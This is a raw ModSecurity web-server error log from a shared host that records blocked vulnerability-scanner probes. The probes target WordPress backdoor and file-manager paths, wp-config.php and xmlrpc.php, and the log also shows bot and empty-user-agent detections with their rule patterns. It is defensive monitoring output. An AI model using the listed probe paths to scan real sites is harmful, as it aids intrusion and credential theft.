[Tue May 26 16:51:44.259256 2026] [security2:error] [pid 823496:tid 823641] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCR5a08mrtyBNpA4PlvwAAAA0"]
[Tue May 26 16:51:44.319472 2026] [security2:error] [pid 823496:tid 823586] [remote 176.31.139.2:42212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "earthone.me"] [uri "/robots.txt"] [unique_id "ahWCSJa08mrtyBNpA4Pl1AAAIVc"]
[Tue May 26 16:51:44.319692 2026] [security2:error] [pid 823496:tid 823661] [client 176.31.139.2:42212] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "earthone.me"] [uri "/robots.txt"] [unique_id "ahWCSJa08mrtyBNpA4Pl1AAAIVc"]
[Tue May 26 16:51:44.424043 2026] [security2:error] [pid 817651:tid 817836] [client 20.195.182.1:4319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CoAAAALw"]
[Tue May 26 16:51:44.424145 2026] [security2:error] [pid 817651:tid 817836] [client 20.195.182.1:4319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CoAAAALw"]
[Tue May 26 16:51:44.528789 2026] [security2:error] [pid 817651:tid 817864] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/css/dist/"] [unique_id "ahWCSNlGRCPPN1dS2y3CoQAAANg"]
[Tue May 26 16:51:44.716605 2026] [security2:error] [pid 823496:tid 823636] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCSJa08mrtyBNpA4Pl1QAAAAg"]
[Tue May 26 16:51:44.788785 2026] [security2:error] [pid 817651:tid 817822] [client 20.195.182.1:4306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp_filemanager.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CpAAAAK4"]
[Tue May 26 16:51:44.788907 2026] [security2:error] [pid 817651:tid 817822] [client 20.195.182.1:4306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp_filemanager.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CpAAAAK4"]
[Tue May 26 16:51:44.899133 2026] [security2:error] [pid 817651:tid 817789] [client 20.206.111.203:6097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CqQAAAI0"]
[Tue May 26 16:51:44.899265 2026] [security2:error] [pid 817651:tid 817789] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CqQAAAI0"]
[Tue May 26 16:51:45.087079 2026] [security2:error] [pid 817651:tid 817903] [client 20.63.34.22:12287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCSdlGRCPPN1dS2y3CrgAAAP8"]
[Tue May 26 16:51:45.087186 2026] [security2:error] [pid 817651:tid 817903] [client 20.63.34.22:12287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCSdlGRCPPN1dS2y3CrgAAAP8"]
[Tue May 26 16:51:45.156758 2026] [security2:error] [pid 823496:tid 823677] [client 20.195.182.1:4259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/file18.php"] [unique_id "ahWCSZa08mrtyBNpA4Pl3gAAADE"]
[Tue May 26 16:51:45.156903 2026] [security2:error] [pid 823496:tid 823677] [client 20.195.182.1:4259] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/file18.php"] [unique_id "ahWCSZa08mrtyBNpA4Pl3gAAADE"]
[Tue May 26 16:51:45.318519 2026] [security2:error] [pid 823496:tid 823687] [client 69.203.102.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCSJa08mrtyBNpA4Pl0gAAADs"]
[Tue May 26 16:51:45.403482 2026] [security2:error] [pid 823496:tid 823683] [client 20.206.111.203:6090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/l10n/"] [unique_id "ahWCSZa08mrtyBNpA4Pl3wAAADc"]
[Tue May 26 16:51:45.508860 2026] [security2:error] [pid 823496:tid 823727] [client 20.195.182.1:4320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWCSZa08mrtyBNpA4Pl4AAAAGM"]
[Tue May 26 16:51:45.509026 2026] [security2:error] [pid 823496:tid 823727] [client 20.195.182.1:4320] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWCSZa08mrtyBNpA4Pl4AAAAGM"]
[Tue May 26 16:51:45.590517 2026] [security2:error] [pid 823496:tid 823750] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCSZa08mrtyBNpA4Pl4QAAAHo"]
[Tue May 26 16:51:45.775267 2026] [security2:error] [pid 823496:tid 823729] [client 20.206.111.203:6090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/"] [unique_id "ahWCSZa08mrtyBNpA4Pl5AAAAGU"]
[Tue May 26 16:51:45.866771 2026] [security2:error] [pid 817651:tid 817841] [client 20.195.182.1:4343] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp-config.php"] [unique_id "ahWCSdlGRCPPN1dS2y3CtQAAAME"]
[Tue May 26 16:51:45.866898 2026] [security2:error] [pid 817651:tid 817841] [client 20.195.182.1:4343] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp-config.php"] [unique_id "ahWCSdlGRCPPN1dS2y3CtQAAAME"]
[Tue May 26 16:51:45.959820 2026] [security2:error] [pid 823496:tid 823731] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCSZa08mrtyBNpA4Pl6AAAAGc"]
[Tue May 26 16:51:46.086658 2026] [security2:error] [pid 817651:tid 817766] [remote 54.39.136.217:19424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "earthone.me"] [uri "/"] [unique_id "ahWCStlGRCPPN1dS2y3CugAA7HI"]
[Tue May 26 16:51:46.086889 2026] [security2:error] [pid 817651:tid 817884] [client 54.39.136.217:19424] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "earthone.me"] [uri "/"] [unique_id "ahWCStlGRCPPN1dS2y3CugAA7HI"]
[Tue May 26 16:51:46.087947 2026] [security2:error] [pid 823496:tid 823701] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCSJa08mrtyBNpA4Pl1wAAAEk"]
[Tue May 26 16:51:46.148874 2026] [security2:error] [pid 823496:tid 823684] [client 20.206.111.203:6090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl7AAAADg"]
[Tue May 26 16:51:46.148996 2026] [security2:error] [pid 823496:tid 823684] [client 20.206.111.203:6090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl7AAAADg"]
[Tue May 26 16:51:46.372334 2026] [security2:error] [pid 823496:tid 823742] [client 142.147.111.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl7wAAAHI"], referer: https://www.anujtradingco.com/
[Tue May 26 16:51:46.540422 2026] [security2:error] [pid 823496:tid 823651] [client 20.206.111.203:6056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl8wAAABc"]
[Tue May 26 16:51:46.540552 2026] [security2:error] [pid 823496:tid 823651] [client 20.206.111.203:6056] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl8wAAABc"]
[Tue May 26 16:51:46.789394 2026] [security2:error] [pid 823496:tid 823705] [client 117.198.37.168:56399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl9gAAAE0"]
[Tue May 26 16:51:46.789492 2026] [security2:error] [pid 823496:tid 823705] [client 117.198.37.168:56399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl9gAAAE0"]
[Tue May 26 16:51:46.938334 2026] [security2:error] [pid 823496:tid 823669] [client 20.206.111.203:5980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl9wAAACk"]
[Tue May 26 16:51:46.938478 2026] [security2:error] [pid 823496:tid 823669] [client 20.206.111.203:5980] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWCSpa08mrtyBNpA4Pl9wAAACk"]
[Tue May 26 16:51:47.391610 2026] [security2:error] [pid 817651:tid 817815] [client 20.206.111.203:6123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahWCS9lGRCPPN1dS2y3CwQAAAKc"]
[Tue May 26 16:51:47.391758 2026] [security2:error] [pid 817651:tid 817815] [client 20.206.111.203:6123] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahWCS9lGRCPPN1dS2y3CwQAAAKc"]
[Tue May 26 16:51:47.567600 2026] [security2:error] [pid 823496:tid 823678] [client 142.147.111.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCS5a08mrtyBNpA4Pl_AAAADI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1267370&moderation-hash=2312169d341601e7204dfd8ea02c61c0
[Tue May 26 16:51:47.865044 2026] [security2:error] [pid 817651:tid 817868] [client 20.206.111.203:6138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahWCS9lGRCPPN1dS2y3CygAAANw"]
[Tue May 26 16:51:47.865190 2026] [security2:error] [pid 817651:tid 817868] [client 20.206.111.203:6138] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahWCS9lGRCPPN1dS2y3CygAAANw"]
[Tue May 26 16:51:48.263990 2026] [security2:error] [pid 817651:tid 817847] [client 20.206.111.203:6101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-bin/admin.php"] [unique_id "ahWCTNlGRCPPN1dS2y3CzQAAAMc"]
[Tue May 26 16:51:48.264103 2026] [security2:error] [pid 817651:tid 817847] [client 20.206.111.203:6101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-bin/admin.php"] [unique_id "ahWCTNlGRCPPN1dS2y3CzQAAAMc"]
[Tue May 26 16:51:48.609380 2026] [security2:error] [pid 823496:tid 823646] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCS5a08mrtyBNpA4Pl-gAAABI"]
[Tue May 26 16:51:48.671810 2026] [security2:error] [pid 817651:tid 817832] [client 20.206.111.203:6110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahWCTNlGRCPPN1dS2y3C1AAAALg"]
[Tue May 26 16:51:48.671931 2026] [security2:error] [pid 817651:tid 817832] [client 20.206.111.203:6110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahWCTNlGRCPPN1dS2y3C1AAAALg"]
[Tue May 26 16:51:49.100919 2026] [security2:error] [pid 823496:tid 823635] [client 20.206.111.203:6113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/BypassBest.php"] [unique_id "ahWCTZa08mrtyBNpA4PmBwAAAAc"]
[Tue May 26 16:51:49.101020 2026] [security2:error] [pid 823496:tid 823635] [client 20.206.111.203:6113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/BypassBest.php"] [unique_id "ahWCTZa08mrtyBNpA4PmBwAAAAc"]
[Tue May 26 16:51:49.545345 2026] [security2:error] [pid 823496:tid 823636] [client 20.206.111.203:6136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/"] [unique_id "ahWCTZa08mrtyBNpA4PmCgAAAAg"]
[Tue May 26 16:51:49.729722 2026] [security2:error] [pid 823496:tid 823656] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCTZa08mrtyBNpA4PmDAAAABw"]
[Tue May 26 16:51:49.911437 2026] [security2:error] [pid 823496:tid 823671] [client 20.206.111.203:6136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahWCTZa08mrtyBNpA4PmDgAAACs"]
[Tue May 26 16:51:49.911545 2026] [security2:error] [pid 823496:tid 823671] [client 20.206.111.203:6136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahWCTZa08mrtyBNpA4PmDgAAACs"]
[Tue May 26 16:51:50.282267 2026] [security2:error] [pid 817651:tid 817820] [client 20.206.111.203:6094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahWCTtlGRCPPN1dS2y3C8wAAAKw"]
[Tue May 26 16:51:50.282389 2026] [security2:error] [pid 817651:tid 817820] [client 20.206.111.203:6094] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahWCTtlGRCPPN1dS2y3C8wAAAKw"]
[Tue May 26 16:51:50.354283 2026] [security2:error] [pid 817651:tid 817839] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCTdlGRCPPN1dS2y3C3QAAAL8"]
[Tue May 26 16:51:50.434890 2026] [security2:error] [pid 817651:tid 817892] [client 20.151.130.61:64546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCTtlGRCPPN1dS2y3C_gAAAPQ"]
[Tue May 26 16:51:50.435036 2026] [security2:error] [pid 817651:tid 817892] [client 20.151.130.61:64546] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCTtlGRCPPN1dS2y3C_gAAAPQ"]
[Tue May 26 16:51:50.653493 2026] [security2:error] [pid 817651:tid 817834] [client 20.206.111.203:6052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DAwAAALo"]
[Tue May 26 16:51:50.653654 2026] [security2:error] [pid 817651:tid 817834] [client 20.206.111.203:6052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DAwAAALo"]
[Tue May 26 16:51:50.680639 2026] [security2:error] [pid 817651:tid 817806] [client 20.151.130.61:64535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DBAAAAJ4"]
[Tue May 26 16:51:50.680744 2026] [security2:error] [pid 817651:tid 817806] [client 20.151.130.61:64535] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DBAAAAJ4"]
